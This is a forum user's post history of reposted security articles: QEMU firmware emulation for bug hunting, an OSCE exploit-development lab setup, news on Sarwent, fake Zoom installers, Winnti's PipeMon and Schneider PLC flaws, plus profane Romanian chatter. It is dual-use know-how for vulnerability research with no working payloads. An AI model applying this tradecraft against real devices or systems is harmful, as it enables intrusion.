-
Posts
1026 -
Joined
-
Days Won
55
Everything posted by Kev
-
MindShaRE is our periodic look at various reverse engineering tips and tricks. The goal is to keep things small and discuss some everyday aspects of reversing. You can view previous entries in this series here. Often, people dismiss router or IoT security research as easy. “Just emulate it with QEMU!” is usually what they say. They probably will also tell you to “just buy low, sell high” to make money in the stock market. The difficult, if not impossible part of trading stocks is knowing when the prices are at the lowest, and highest. Similarly, knowing how to emulate firmware with QEMU is probably the hardest part for a newcomer to the embedded security research scene. While I cannot offer much help with trading advice, I can help with firmware emulation. Before we begin, I’ll assume your firmware is UNIX-like and not running on some other real-time operating system (RTOS) such as VxWorks or Windows CE. I’ll also assume you have your firmware decrypted/de-obfuscated and the root file system extracted. If you are having trouble with encrypted firmware, check out my earlier blog post on dealing with encrypted firmware. Begin with the End in Mind A key part of device emulation is having an end goal. Do you want to run just one binary? How about just one service? Or do you want full device emulation? Since getting the firmware emulation to work properly is a time-consuming feat, your goal will greatly influence your emulation strategy. Sometimes, the countless hours lost to tweaking the emulation will justify the purchase of some of these low-cost devices. For running a single binary such as a decryption routine, consider the more light-weight user space QEMU emulation approach. If your goal is to write exploits, working with a physical device may be the best since exploits are ultimately used against real-world devices. Emulation may not account for subtle hardware behavior such as instruction caches, which could affect memory corruption exploits. However, emulation is perfectly fine for developing and testing exploits for higher-level vulnerabilities such as a CGI-script command injection or login logic flaws in PHP pages. Determining CPU architecture and information gathering The first step in emulating anything is determining the CPU architecture for our target. Usually, we can determine this without a device on hand. One way to determine the CPU type is through analyzing the firmware binaries. Running the file command on any binary can quickly tell us what CPU architecture we are dealing with: Figure 1 – Outputs of the file and readelf commands However, the file command does not provide the most detailed results. The readelf command with the -A option for ARM binary provides much more detailed CPU information that is vital for full system emulation and cross-compilation. Another way of determining the CPU architecture when working with wireless routers (using the TP-Link TL-WR841-ND as an example [1]) is by searching for the device model on the Internet. This will usually land us on an OpenWRT device page that provides information on the device hardware. A quick search can also tell us the main System on Chip (SoC) part number as well as the device FCC ID. We can then look for the datasheet for the corresponding SoC chip and determine the exact CPU architecture. This is also a great time to search for the family-specific processor core datasheet to familiarize yourself with the CPU. This datasheet will provide device-specific information such as load address and low-level memory layout which may help with emulation and analysis. You can also lookup the FCC filing reports to get a glimpse of the internal view of the device. User-mode emulation Per-process emulation is useful when only one binary needs to be emulated. There are two ways to emulate a single binary in user-mode QEMU. The first option is the user-mode process emulation. This can be done with one of the following commands: qemu-mipsel -L <prefix> <binary> qemu-arm -L <prefix> <binary> qemu-<arch> -L <prefix> <binary> The -L option is important for when the binary links to external dependencies such as uCLibc or encryption libraries. It tells the dynamic linker to look for dependencies with the provided prefix. Below is an example of running the imgdecrypt binary for the D-Link DIR-882 router. Figure 2 - imgdecrypt Another way to emulate the process is to perform a cross-architectural chroot with QEMU. To do this, we copy the qemu-<arch>-static binary to the /usr/bin/ directory of the firmware root file system. We then chroot into the firmware root and obtain a working shell: Figure 3 - Using QEMU to perform a cross-architectural chroot This is possible due to QEMU registering with the kernel during installation to handle binaries with certain magic bytes via the binfmt_misc mechanism. Therefore, this technique is incompatible with the Scratchbox cross-compilation toolkit, which leverages the same mechanism. You can find a more detailed explanation of the cross-architectural chroot in this StackOverflow post. This method is my preferred first attempt to emulate a device. It is quick to set up and allows me to experiment with different binaries within the firmware root file system without worrying too much about dependencies. Note that in this mode of emulation, none of the userland services is initialized in the chroot shell, so none of the system or network services are available. However, this could be sufficient for running just one binary or testing one small component. Bring out the big guns: Full system emulation Sometimes, we’ll need to analyze the firmware more comprehensively and will benefit from full system emulation. There are many ways to fully emulate a device. Here are a few of the most common emulation techniques. These techniques have been used by researchers to find real bugs that were subsequently submitted to the ZDI program. In the first part of the emulation process, we will use QEMU to create a full Linux virtual machine running on the target architecture. We then transfer the firmware root file system into the VM and chroot into the root file system of the firmware. To create a full VM running in QEMU we typically need the following things: A QEMU disk image file (qcow2) A Linux kernel image compiled for the target architecture (sometimes) an initial RAM disk Image (initrd) To get the above items, you can certainly set up a cross-compiler, build the kernel, and download an installer to get the initial RAM disk. You could then install Linux onto the QEMU disk image file. However, cross compiling a kernel is a substantial side quest for the casual bug hunter or Linux beginner. If you are interested in preparing these files yourself, check out the links in the further reading section. In this blog, we’ll take a simpler approach. We will download and use the pre-built Debian images prepared by Aurelien Jarn, a Debian developer. Alternatively, you could use the images provided by Chris (@_hugsy_), the author of the “gef” plugin. With all the files in place, we can start a QEMU VM with the proper CPU architecture with one of the following commands: sudo qemu-system-mipsel -M malta -kernel vmlinux-2.6.32-5-4kc-malta -hda debian_squeeze_mipsel_standard.qcow2 -append "root=/dev/sda1 console=tty0" sudo qemu-system-mipsel -M malta -kernel vmlinux-3.2.0-4-4kc-malta -hda debian_wheezy_mipsel_standard.qcow2 -append "root=/dev/sda1 console=tty0" sudo qemu-system-arm -M vexpress-a9 -kernel vmlinuz-3.2.0-4-vexpress -initrd initrd.img-3.2.0-4-vexpress -drive if=sd,file=debian_wheezy_armhf_standard.qcow2 -append "root=/dev/mmcblk0p2" sudo qemu-system-arm -M vexpress-a9 -kernel vmlinuz-3.2.0-4-vexpress -initrd initrd.img-3.2.0-4-vexpress -drive if=sd,file=debian_wheezy_armhf_desktop.qcow2 -append "root=/dev/mmcblk0p2" The -M, or the -machine option, specifies the board model that QEMU supports, this option allows the user to select the target hardware platform. The -append options lets you tweak the kernel options passed into the Linux kernel. I like to put the QEMU command into a bash script to speed up the process of making adjustments and starting of the VM. Additionally, we should append the following options to the QEMU call to connect the network interfaces and add port forwarding settings: -net user,hostfwd=tcp::80-:80,hostfwd=tcp::443-:443,hostfwd=tcp::2222-:22 \ -net nic Adding these options will allow us to communicate with the VM via SSH through port 2222 of the host computer as well as the HTTP and HTTPS pages of the emulated firmware. Figure 4 - Starting a pre-built Debian image Once the VM is booted up and gives us a working Debian VM, the second part of the emulation begins. Transfer the root file system of the firmware to the VM using SCP or HTTP. I find packing up the whole root file system in a TAR ball is the most effective way to handle the transfer. We then need to mount the /proc, /dev, and /sys directories of the VM to the corresponding files in the firmware file system. Finally, we chroot into the firmware file system using the following command: chroot ~/firmware_rootfs /bin/sh The second option tells chroot to run /bin/sh after changing the root directory. You may be required to change this command to /bin/bash or /bin/busybox to obtain a working shell. Figure 5 - Busybox With a working shell, we can navigate to /etc/rc.d or /etc/init.d and run the appropriate RC script to kick off the userland services. Closely analyze the rc.d folder and inspect the scripts, you’ll need to tweak the startup scripts to account for missing network interfaces, failing of NVRAM library call, and all sorts of fun stuff. This part of the emulation process is very much like dealing with encrypted firmware; each firmware will be an adventure of its own which is the very definition of research. Often, you’ll want to tweak the rcS scripts just enough to get the target service to run properly. This part of the process can take up weeks of investigation and additional work. Emulation is a lot of work. Sometimes standing on the shoulders of giants is the better way to go. There are two main projects that help speed up the process of firmware emulation, namely Firmadyne and ARM-X. 60% of the time, it works every time: Firmadyne Firmadyne is great when it works. It is a firmware emulation platform that attempts to automagically emulate Linux-based device firmware. Firmadyne supports both MIPS and ARM processors. It will extract the root file system, infer network interfaces, and create the QEMU disk image for emulation. It also attempts to emulate the NVRAM. If you need full system emulation for a new target, I recommend giving Firmadyne a try first. You can then attempt to fix some of the errors it runs into before trying other emulation techniques. I have experienced trouble running Firmadyne using newer QEMU releases. However, using Docker to install it typically avoids this problem. ARM-X The ARM-X Firmware Emulation Framework targets ARM-based firmware. It is a collection of kernels, scripts, and filesystems to emulate firmware with QEMU. It comes with a few emulation configuration examples to help you with your project. I recommend watching the hour-long Hack In The Box 2019 presentation recording by Saumil Shah (@therealsaumil) on YouTube before trying out the ARM-X VM. If you are completely new to IoT firmware research, the presentation is also a great resource to start with. Conclusion Hopefully, with the help of this blog, you are ready to “just emulate it with QEMU.” All the techniques demonstrated above (including ARM-X and Firmadyne) were used in various submissions to our program. All roads may lead to Rome, but there’s not a single, fixed way to emulate firmware with QEMU. Explore different techniques and see what works for you. Familiarize yourself with the knowledge to wield the beast named QEMU and you will be surprised at how it can help you in unexpected ways. Finally, I would love to learn about your emulation techniques and look forward to your next submission. You can find me on Twitter @TrendyTofu, and follow the team for the latest in exploit techniques and security patches. Source: zerodayinitiative.com
-
Poate verifica cineva acest fisier daca este safe?
Kev replied to grandson's topic in Discutii incepatori
este un f#t#t de crack pentru Minecraft (virusat bineinteles) -
Bai cap de pluta nu stiu ce ai cu mine, dar eu personal o cunosc pe Nadia de cand se juca cu puța in nisip,, hatere, fake
-
Security researchers have discovered a new version of Sarwent malware that has new command functionality, such as executing PowerShell commands and preference for using RDP. Dating back to 2018, Sarwent has mostly been known as a dropper malware with a limited set of commands, such as download, update and vnc. Dropper malware is a kind of Trojan designed to install other malware on a target system. Researchers at SentinelOne warned that attackers are now using a new version of the Sarwent malware to target the Remote Desktop Protocol (RDP) port on Windows systems to execute backdoor commands. Reaves also said Sarwent uses the same binary signer as one or more TrickBot operators. Futhermore, Reaves pointed out that the “rdp” command and code execution looks to perform tasks, such as: Add users List groups and users Punch a hole in local firewall. These functions could forewarn actors are preparing to target systems for RDP access at a later time. Readers may also remember attackers have been known to exploit RDP-related vulnerabilities, such as the BlueKeep vulnerability CVE-2019-0708. In conclusion, cyber criminals likely will continue to leverage malware, like Sarwent, to leverage RDP for monetization such as selling access to systems. Via securezoo.com
-
- 1
-
DA!, am dovezi, figurez în lista castigatorilor, iar in tracker apare alta semnatura
-
Salut, am castigat cateva produse in promotia Winston Romania, am castigat cateva produse care nu mi-au ajuns (pandemie), astept de 50 zile, au fost livrate prin dpd.com, sun raspunde robotul, sun la info-line youtfreedom.ro, se eschiveaza, sun curierii de la dpd.ro, se eschiveaza, tinand cont ca e vorba de Smartwatch, boxa portabila, netbook, baterie externa Sa ma fut in plamanii lor /edit: am verificat AWB, apare livrat cu o semnatura in forma de X //Cancerul sa va manance
-
Claimed as the fastest internet speed that has been tested and recorded in the world. Image: Monash University A group of researchers from Monash, Swinburne, and RMIT universities have claimed that they have successfully tested and recorded the world's fastest internet data speed of 44.2Tbps using a single optical chip known as a micro-comb. The findings, published in the Nature Communications journal, revealed how the data speed achieved has the capacity to support high-speed internet connections of 1.8 million households in Melbourne, and users can download 1,000 HD movies in seconds. According to the researchers, the micro-comb, which is touted to be a smaller and lighter device than existing telecommunications hardware, was used to replace 80 infrared lasers and load-tested in infrastructure that mirrored networks used by the National Broadband Network. They did this by placing the micro-comb in 76.6km of installed dark optical fibres between RMIT's Melbourne city campus and Monash University's Clayton campus. The micro-comb was used to mimic a rainbow of infrared lasers so that each 'laser' has the capacity to be used as a separate communications channel. To simulate peak internet usage during testing, the researchers sent maximum data through each channel across 4THz of bandwidth. RMIT's Arnan Mitchell said the future ambition for the project is to scale up the current transmitters from hundreds of gigabytes per second towards tens of terabytes per second without increasing size, weight, or cost. A sample of some of the perovskite cells used in the experiment. Image: UNSW Elsewhere, scientists from the University of Sydney have tested how to improve the thermal stability of perovskite solar cells so that it could potentially be used as an alternate to silicon-based solar cells. The scientists used a polymer-glass blanket with a pressure-tight seal to suppress the decomposition of the perovskite cells, a process known as outgassing. The test was also able to determine if the perovskite solar cells could survive more than 1,800 hours of 85% relative humidity and 75 cycles of temperatures between -40 degrees and 85 degrees. Via zdnet.com
-
- 1
-
Speaker: Jorge Orchilles Abstract: Adversary Emulation is a type of Red Team Exercise where the Red Team emulates how an adversary operates, following the same tactics, techniques, and procedures (TTPs), with a specific objective (similar to those of realistic threats or adversaries). Adversary emulations are performed using a structured approach, which can be based on a kill chain or attack flow. Methodologies and Frameworks for Adversary Emulations will be covered shortly. Adversary emulation Red Team Exercises emulate an end-to-end attack against a target organization to obtain a holistic view of the organization’s preparedness for a real, sophisticated attack. This will be the main focus of SANS SEC564 Red Team Exercises and Adversary Emulation. Command and Control is one of the most important tactics in the MITRE ATT&CK matrix as it allows the attacker to interact with the target system and realize their objectives. Organizations leverage Cyber Threat Intelligence to understand their threat model and adversaries that have the intent, opportunity, and capability to attack. Red Team, Blue Team, and virtual Purple Teams work together to understand the adversary Tactics, Techniques, and Procedures to perform adversary emulations and improve detective and preventive controls. The C2 Matrix was created to aggregate all the Command and Control frameworks publicly available (open-source and commercial) in a single resource to assist teams in testing their own controls through adversary emulations (Red Team or Purple Team Exercises). Phase 1 lists all the Command and Control features such as the coding language used, channels (HTTP, TCP, DNS, SMB, etc.), agents, key exchange, and other operational security features and capabilities. This allows more efficient decisions making when called upon to emulate and adversary TTPs. It is the golden age of Command and Control (C2) frameworks. Learn how these C2 frameworks work and start testing against your organization to improve detective and preventive controls. Learn how Red Teams and Blue Teams work together in virtual Purple Teams -Leverage Cyber Threat Intelligence to understand adversary tactics, techniques, and procedures Perform adversary emulations in Red or Purple Team Exercises Choose which command and control to use for the assessment to provide the most value -Measure and improve people, process, and technology Source
-
- 1
-
- adversary emulation
- jorge orchilles
-
(and 2 more)
Tagged with:
-
Microsoft has patented a cryptocurrency mining system that leverages human activities, including brain waves and body heat, when performing online tasks such as using search engines, chatbots, and reading ads. “A user can solve the computationally difficult problem unconsciously,” the patent reads. Crypto System Leveraging Body Activity Data Microsoft Technology Licensing, the licensing arm of Microsoft Corp., has been granted an international patent for a “cryptocurrency system using body activity data.” The patent was published by the World Intellectual Property Organization (WIPO) on March 26. The application was filed on June 20 last year. “Human body activity associated with a task provided to a user may be used in a mining process of a cryptocurrency system,” the patent reads, adding as an example: Microsoft has patented a “cryptocurrency system using body activity data” with the World Intellectual Property Organization (WIPO), the agency of the United Nations responsible for treaties involving copyright, patent, and trademark laws. Noting that the method described may “reduce computational energy for the mining process as well as make the mining process faster,” the patent details: Patent Suggests Alternative Way to Mine Cryptocurrencies The patent describes a system where a device can verify whether “the body activity data satisfies one or more conditions set by the cryptocurrency system, and award cryptocurrency to the user whose body activity data is verified.” Microsoft patents a cryptocurrency system leveraging different types of sensors to “measure or sense body activity or scan human body,” such as heart rate monitors, thermal sensors, and optical sensors. Different types of sensors can be used to “measure or sense body activity or scan human body,” the patent explains. They include “functional magnetic resonance imaging (fMRI) scanners or sensors, electroencephalography (EEG) sensors, near infrared spectroscopy (NIRS) sensors, heart rate monitors, thermal sensors, optical sensors, radio frequency (RF) sensors, ultrasonic sensors, cameras, or any other sensor or scanner” that will do the same job. The system may reward cryptocurrency to an owner or a task operator “for providing services, such as, search engines, chatbots, applications or websites, offering users access for free to paid contents (e.g. video and audio streaming or electric books), or sharing information or data with users,” the patent details. The idea of mining cryptocurrencies using human body heat has previously been explored by other organizations. For example, Manuel Beltrán, founder of the Dutch Institute of Human Obsolescence, set up an experiment in 2018 to mine cryptocurrencies with a special bodysuit that harvested the human body heat into a sustainable energy source. The electricity generated was then fed to a computer to mine cryptocurrencies. What do you think of Microsoft’s new cryptocurrency mining system? Let us know in the comments section below. Via news.bitcoin.com
- 2 replies
-
- 3
-
- wipo
- world intellectual property organization
- (and 1 more)
-
Ping Castle Introduction The risk level regarding Active Directory security has changed. Several vulnerabilities have been made popular with tools like mimikatz or sites likes adsecurity.org. Ping Castle is a tool designed to assess quickly the Active Directory security level with a methodology based on risk assessment and a maturity framework. It does not aim at a perfect evaluation but rather as an efficiency compromise. |:. PingCastle (Version 2.5.2.0) | #:. Get Active Directory Security at 80% in 20% of the time # @@ > End of support: 31/07/2020 | @@@: : .# Vincent LE TOUX (contact@pingcastle.com) .: https://www.pingcastle.com Using interactive mode. Do not forget that there are other command line switches like --help that you can use What you would like to do? 1-healthcheck-Score the risk of a domain 2-graph -Analyze admin groups and delegations 3-conso -Aggregate multiple reports into a single one 4-nullsession-Perform a specific security check 5-carto -Build a map of all interconnected domains 6-scanner -Perform specific security checks on workstations Check https://www.pingcastle.com for the documentation and methodology Build PingCastle is a c# project which can be build from Visual Studio 2012 to Visual Studio 2017 Support & lifecycle For support requests, you should contact support@pingcastle.com The support for the basic edition is made on a best effort basis and fixes delivered when a new version is delivered. The Basic Edition of PingCastle is released every 6 months (January, August) and this repository is updated at each release. If you need changes, please contact contact@pingcastle.com for support packages. License PingCastle source code is licensed under a proprietary license and the Non-Profit Open Software License ("Non-Profit OSL") 3.0. Except if a license is purchased, you are not allowed to make any profit from this source code. To be more specific: It is allowed to run PingCastle without purchasing any license on for profit companies if the company itself (or its ITSM provider) run it. To build services based on PingCastle AND earning money from that, you MUST purchase a license. Ping Castle uses the following Open source components: Bootstrap licensed under the MIT license JQuery licensed under the MIT license vis.js licensed under the MIT license Author Author: Vincent LE TOUX You can contact me at vincent.letoux@gmail.com Download pingcastle-master.zip or git clone https://github.com/vletoux/pingcastle.git Source
-
- 1
-
- pingcastle
- vincent le toux
-
(and 1 more)
Tagged with:
-
OBLIGATORY INTRO Howdy! This is the first post in a multi-part series detailing steps taken, and exploits written, as part of my OSCE exam preparation. I intend to use these practice sessions to refine my exploit development process while sharing any knowledge gained. I originally wanted to take this course a few years ago, but could never quite lock it in. Recently, I was fortunate enough to have work fund the course. Since then, I’ve been spending my free time listening to Muts’ dulcet tones and working through the modules. I wrapped up the official course material yesterday and plan to work through some additional work recommended by some OSCE graduates. What makes the timing awesome for me is that I just finished up CSC 748 - Software Exploitation for my graduate course work. The course dealt with Windows x86 exploitation, fuzzing, and shellcoding. Sound familiar? It dove into some topics that OSCE doesn’t cover such as using ROP to bypass DEP. I’m incredibly happy to have been able to do both of them one right after the other. I’ll be including some of the shellcoding tricks I learned from the course in this series at some point. EXPLOIT DEVELOPMENT ENVIRONMENT This post will cover setting up a lab environment. While this may not be the most interesting topic, we’ll cover some setup tips that may be helpful. Don’t worry, we won’t go step by step through setting up all these things unless it’s warranted. OPERATING SYSTEM For these practice sessions, we’ll attempt to stick reasonably close to an OSCE environment by using a 32bit Windows 7 VM. Unfortunately, Microsoft has taken down the IE/Edge Virtual Machine images from their site. You can only get the Windows 10 images nowadays. Fear not! If you find yourself in need of an older version, they’re archived and can still be downloaded at the link below. Windows VM Images SCRIPTING LANGUAGE We’ll be writing all proof of concepts using Python 3. Python 2 still gets a lot of use in PoCs for exploits and exploit-centric tooling, however, I strongly prefer 3 as a language overall and will stick to it throughout these posts. The latest version of Python (3.8.2 at the time of this writing) can be found here. HEX EDITOR There are times we’ll need a hex editor. I prefer 010 when working on windows. NASMSHELL Part of creating shellcode is janking™ around with the instructions to find what works in the smallest amount of space without known bad characters. nasmshell makes it incredibly easy to check which opcodes are generated by which instructions. Of note, nasmshell requires python2. FUZZER For network fuzzing, we’ll be using boofuzz. It’s a fork of and the successor to the venerable Sulley fuzzing framework. Sulley has been the preeminent open source fuzzer for some time, but has fallen out of maintenance. Installation consists of a simple pip command. pip install boofuzz --user AUTOMATIC CRASH DETECTION & PROCESS RESTART This part is totally optional. Boofuzz offers a utility called process_monitor.py that detects crashes and restarts the target binary automatically. It requires a few additional libraries to run and must run on the target machine itself. As we’ll be doing all coding and fuzzing from the same windows environment, this is fine. The install steps are located here. I won’t copy and paste them here, however I will note something that I was forced to do during installation. All of the libraries for process_monitor.py are installed into my Python2.7 environment. Whereas boofuzz is installed into my Python3.8 environment. This is because pydasm requires Python2.7. The end result is that we’ll be scripting fuzzers in Python3, and executing process_monitor.py with Python2. Also, there is a note on the install page: I didn’t need to do anything to satisfy this requirement, as my flare-vm install script pulled it down for me. DEBUGGER The topic of which debugger to use seems to be pretty contentious in the OSCE forums/chats. We’ll be using WinDbg. The reason is that I spent 4 months using it for college and have come to like it. FLARE-VM To install WinDbg (and some other tools), I used the Flare-VM install script. Flare-VM will take a Windows 7-10 machine and install a plethora of RE tools. I modified the flare’s profile.json for a relatively light-weight installer. Flare-VM install instructions Customizing Installed Packages And if you’re feeling lazy, here’s my profile.json. { "env": { "TOOL_LIST_DIR": "%ProgramData%\\Microsoft\\Windows\\Start Menu\\Programs\\FLARE", "TOOL_LIST_SHORTCUT": "%UserProfile%\\Desktop\\FLARE.lnk", "RAW_TOOLS_DIR": "%SystemDrive%\\Tools", "TEMPLATE_DIR": "flarevm.installer.flare" }, "packages": [ {"name": "dotnetfx"}, {"name": "powershell"}, {"name": "vcbuildtools.fireeye"}, {"name": "vcpython27"}, { "name": "python2.x86.nopath.flare", "x64Only": true, "args": "--package-parameters \'/InstallDir:C:\\Python27.x86\'" }, {"name": "libraries.python2.fireeye"}, {"name": "libraries.python3.fireeye"}, {"name": "windbg.flare"}, {"name": "windbg.kenstheme.flare"}, {"name": "windbg.ollydumpex.flare"}, {"name": "windbg.pykd.flare"}, {"name": "ghidra.fireeye"}, {"name": "vbdecompiler.flare"}, {"name": "010editor.flare"}, {"name": "resourcehacker.flare"}, {"name": "processdump.fireeye"}, {"name": "7zip.flare"}, {"name": "putty"}, {"name": "wget"}, {"name": "processhacker.flare"}, {"name": "sysinternals.flare"}, {"name": "ncat.flare"}, {"name": "shellcode_launcher.flare"}, {"name": "xorsearch.flare"}, {"name": "xorstrings.flare"}, {"name": "lordpe.flare"}, {"name": "googlechrome.flare"}, {"name": "nasm.fireeye"} ] } MONA.PY Even after using Flare-VM’s installer, we’re still missing a key tool, mona.py. Mona.py is an incredible tool; it’s bonkers how many facets of exploit dev on windows are made easier with mona. To get mona up and running with WinDbg, we’ll just need to follow these steps. We can confirm everything works by opening up WinDbg, attaching to some benign process, and running the following commands: .load pykd.pyd ══════════════ Processing initial command '.load pykd.pyd' !py mona ════════ [+] Command used: !py C:\Program Files\Windows Kits\10\Debuggers\x86\mona.py 'mona' - Exploit Development Swiss Army Knife - WinDBG (32bit) Plugin version : 2.0 r605 Python version : 2.7.18 (v2.7.18:8d21aa21f2, Apr 20 2020, 13:19:08) [MSC v.1500 32 bit (Intel)] PyKD version 0.3.2.2 Written by Corelan - https://www.corelan.be Project page : https://github.com/corelan/mona |------------------------------------------------------------------| | _ __ ___ ___ _ __ __ _ _ __ _ _ | | | '_ ` _ \ / _ \ | '_ \ / _` | | '_ \ | | | | | | | | | | | || (_) || | | || (_| | _ | |_) || |_| | | | |_| |_| |_| \___/ |_| |_| \__,_|(_)| .__/ \__, | | | |_| |___/ | | | |------------------------------------------------------------------| SQLITE BROWSER We’ll need a way to look at boofuzz’s results. They’re stored in a database, and the provided web interface leaves something to be desired. As we’ll be working on windows, we’ll need to grab a sqlite database browser. One can be found here. WINDBG - QUALITY OF LIFE TWEAKS We’re going to be spending a ton of time in the debugger, so it should be a debugger that sparks joy! Typing .load pykd.pyd isn’t terribly hard, but doing it every time you restart your debugger can be irksome. We can automatically load the file with a pretty simple trick. right-click on the windbg icon in the toolbar (assuming flare-vm put it there for you) right-click on the windbg (x86) menu item select properties Once we’re in the properties menu, perform the following click on the Shortcut tab add the following command-line option to the Target field: -c ".load pykd.pyd" SANE LOGGING LOCATION Without any configuration, mona.py stores command results beside the debugger’s exe. The exe is stored six levels deep under Program Files and isn’t exactly accessible. The command below will get the logging location squared away for us. !py mona config -set workingfolder c:\monalogs\%p_%i The %p will get populated with the debuggee’s name and the %i will be replaced by the debuggee’s pid. Ex. C:\monalogs\TFTPServerSP_1300 PERSONALIZED WORKSPACE W/ SCRATCHPAD You can personalize WinDbg quite a bit. There are a few themes shipped with WinDbg, and some others can be found with google, though it’s not obvious how to work with them. WinDbg will read Workspace settings from the registry or a .wew file. If you’re loading a .reg file, you can simply double-click the file and it will load. However, we’ll be creating our own .wew file. CREATE THE LAYOUT We’ll take a look at my setup, which is pretty much default, with a slight modification. I like having WinDbg’s scratchpad open. It’s a convenient place for simple notes (usually addresses/offsets). It’s not open in the default configuration, so let’s fix that. Open WinDbg Press alt+8 to open the scratchpad Position it wherever you like My setup looks like this, with the scratchpad positioned to the right of the assembly window. ASSOCIATE THE SCRATCHPAD If the scratchpad isn’t associated to a file on disk, the information disappears when the debugger exits. Fortunately, making the scratchpad persistent is easy. First, right-click the scratchpad’s top bar and select Associate with file.... After that, simply pick a location (I store mine in C:\monalogs) SAVE THE WORKSPACE With a new layout created, we need to save it to disk. There are four different options to save a workspace… We want to use the Save Workspace to File... option. Store it wherever you like. AUTOLOAD THE WORKSPACE With the scratchpad setup and the workspace file saved somewhere, we need to configure windbg to load the workspace on startup. The premise is the same as what we used to autoload pykd. We just need to add the following command-line option to the Target field in WinDbg’s properties. -WF "C:\Users\vagrant\Desktop\with_scratchpad.WEW" FURTHER CONFIGURATION In case you want to go further, you could use some of the themes listed below as a starting point and tweak until you’re content. https://github.com/lololosys/windbg-theme https://github.com/Stolas/WinDBG-DarkTheme C:\ProgramData\chocolatey\lib\windbg.kenstheme.flare\tools\ken.reg https://www.zachburlingame.com/2011/12/customizing-your-windbg-workspace-and-color-scheme/ OBLIGATORY OUTRO The next post in this series will cover exploiting VulnServer’s TRUN command. Check it out here. Source epi052.gitlab.io
-
Hackers taking advantage of the video conferencing apps like Zoom to infect systems with malicious routines. Security researchers from Trend Micro observed two malware samples that pose as Zoom installers but when decoded it contains malware. The malicious fake installer not distributed through official distribution channels. Fake Zoom Installers With the two malware samples, one found installing a backdoor that allows attackers to gain access remotely, another one is the Devil Shadow botnet in devices. The malicious installer resembles closer to the official version, it contains encrypted files that will decrypt the malware version. The malware kills all the running remote utilities upon installation and opens TCP port 5650 to gain remote access to the infected system. Another sample observed by researchers installs Devil Shadow Botnet, the infection starts with the malicious installer with the file named pyclient.cmd which contains malicious commands. With this sample also the threat actors include a copy of the official Zoom installer to deceive the victims. The tampered app installer deploys malicious archive and codes, and the commands for persistence and communication. The malware used to send gathered information to its C&C every 30 seconds every time the computer is turned on. In another campaign, attackers repackaged the legitimate zoom installer with WebMonitor RAT. The infection starts with downloading the malicious file ZoomIntsaller.exe from malicious sources. Due to coronavirus pandemic, many companies around the world asked employees to work from home, which increases the usage of video conferencing apps and it is heavily targeted by attackers. Via gbhackers.com
-
- 1
-
- trend micro
- devil shadow botnet
- (and 4 more)
-
Hackers infect multiple game developers with advanced malware
Kev posted a topic in Stiri securitate
Never-before-seen PipeMon hit one developer's build system, another's game servers. One of the world’s most prolific hacking groups recently infected several Massively Multiplayer Online game makers, a feat that made it possible for the attackers to push malware-tainted apps to one target’s users and to steal in-game currencies of a second victim’s players. Researchers from Slovakian security company ESET have tied the attacks to Winnti, a group that has been active since at least 2009 and is believed to have carried out hundreds of mostly advanced attacks. Targets have included Chinese journalists, Uyghur and Tibetan activists, the government of Thailand, and prominent technology organizations. Winnti has been tied to the 2010 hack that stole sensitive data from Google and 34 other companies. More recently, the group has been behind the compromise of the CCleaner distribution platform that pushed malicious updates to millions of people. Winnti carried out a separate supply-chain attack that installed a backdoor on 500,000 ASUS PCs The recent attack used a never-before-seen backdoor that ESET has dubbed PipeMon. To evade security defenses, PipeMon installers bore the imprimatur of a legitimate Windows signing certificate that was stolen from Nfinity Games during a 2018 hack of that gaming developer. The backdoor—which gets its name for the multiple pipes used for one module to communicate with another and the project name of the Microsoft Visual Studio used by the developers—used the location of Windows print processors so it could survive reboots. Nfinity representatives weren't immediately available to comment.. A strange game In a post published early Thursday morning, ESET revealed little about the infected companies except to say they included several South Korea- and Taiwan-based developers of MMO games that are available on popular gaming platforms and have thousands of simultaneous players. The ability to gain such deep access to at least two of the latest targets is one testament to the skill of Winnti members. Its theft of the certificate belonging to Nfinity Games during a 2018 supply-chain attack on a different crop of game makers is another. Based on the people and organizations Winnti targets, researchers have tied the group to the Chinese government. Often, the hackers target Internet services and software and game developers with the objective of using any data stolen to better attack the ultimate targets. Certified fraud Windows requires certificate signing before software drivers can access the kernel, which is the most security-critical part of any operating system. The certificates—which must be obtained from Windows-trusted authorities after purchasers prove they are providers of legitimate software—can also help to bypass antivirus and other end-point protections. As a result, certificates are frequent plunder in breaches. Despite the theft coming from a 2018 attack, the certificate owner didn’t revoke it until ESET notified it of the abuse. Tudor Dumitras, co-author of a 2018 paper that studied code certificate compromises, found that it wasn’t unusual to see long delays for revocations, particularly when compared with those of TLS certificates used for websites. With requirements that Web certificates be openly published, it’s much easier to track and identify thefts. Not so with code-signing certificates. Dumitras explained in an email: The number of MMO game developers in South Korea and Taiwan is high, and beyond that, there’s no way to know if attackers used their access to actually abuse software builds or game servers. That means there’s little to nothing end users can do to know if they were affected. Given Winnti’s previous successes, the possibility can’t be ruled out. Via arstechnica.com -
unde spanac amanet ai fost tu? pana si in ultimul sat din fundul curtii, ti-l da cu pila si acid, semnezi contract, vrei tu sa faci ceva si nu stii cum
-
https://www.smsglobal.com vorbeste cu ei, Trust
-
Vulnerabilities reminiscent of Stuxnet found in two Schneider Electric products could allow an attacker to gain operation control of a device by intercepting then retransmitting commands. Trustwave’s Global OT/IoT security research team uncovered the flaws in Schneider’s SoMachine Basic v1.6 and Schneider Electric M221, firmware version 1.6.2.0, Programmable Logic Controller (PLC). By exploiting the flaws, a malicious actor could take control of the devices in the same manner operators circa 2005 used the Stuxnet worm to control and ultimately cause Iran’s nuclear centrifuges to destroy themselves. Trustwave analysts were able to use the Schneider Electric vulnerability to intercept, change, then resend commands between the engineering software and the PLC. The second issue is spun off the fact that SoMachine Basic does not perform adequate checks on critical values used in the communications with PLC. If exploited an attacker could potentially be used to send manipulated packets to the PLC, without the software being aware of the manipulation. That’s eerily similar to Stuxnet’s modus operandi, which, according to a 2010 Symantec report, infected one of the Iranian engineering workstations that was being used to manage and control the Siemens Step 7 PLC. Stuxnet infected all the Step 7 projects and side-loaded a malicious dynamic linked library (DLL), which is used by the software to communicate with the PLC. It intercepted and modified all the legitimate packets to the controllers and successfully uploaded malicious logic codes to change the controller behaviors. The malicious library file prevented PLC operators from realizing that the PLCs were compromised. Schneider has patched the SoMachine Basic v1.6 vulnerability and is working on a final mitigation for the second attack. In the meantime the company recommended users block the port on the firewall or disable the protocol. In addition, Trustwave urged organizations to harden the network through micro segmentation and zoning, ensuring that ICS assets and network are monitored for abnormal communications. Via scmagazine.com
-
- 1
-
Nu, o ai aici
-
^ convins/ã On: daca i-ai dat acces la telefon, normal ca poate, poate si farã dar cu mici exceptii
-
